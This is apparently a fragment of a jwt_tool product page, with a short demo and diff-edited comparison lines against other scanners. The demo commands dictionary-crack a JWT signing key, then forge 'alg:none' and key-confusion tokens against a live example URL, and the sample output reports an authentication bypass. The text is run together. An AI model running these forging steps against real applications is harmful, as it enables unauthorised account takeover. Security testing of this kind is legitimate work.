loading

 # crack a weak HMAC key, then forge alg:none and confirm the bypass on a live appjwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QifQ.Jf8v9Q --crack --dict /usr/share/wordlists/rockyou.txtjwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QifQ.Jf8v9Q --exploit a --targeturl https://example.com/api/account --canaryvalue "Welcome, admin"Original JWT:jwttool_orig - eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... [+] EXPLOIT: "alg:none" - signature stripped[+] EXPLOIT: key confusion (RS256 to HS256) accepted[+] Weak HMAC key recovered from dictionary: hunter2 Sending tampered token to https://example.com/api/account ...[+] Response 200 (1487 bytes) - canary "Welcome, admin" found[+] Likely authentication bypass on example.com/api/accountguidance

-Has JWT templates among thousands of checks. jwt-tool goes far deeper on forging, cracking, and tampering.
+JWT templates among thousands of checks. jwt-tool goes deeper on forging, cracking, and tampering one token.

-Cracks JWT signatures at GPU speed. jwt-tool's crack mode is simpler and built into the same workflow.
+GPU-scale JWT signature cracking. jwt-tool crack mode is simpler and stays in the same forge-and-confirm workflow.

 Signature scanner for web apps. jwt-tool is the dedicated JWT specialist for the token itself.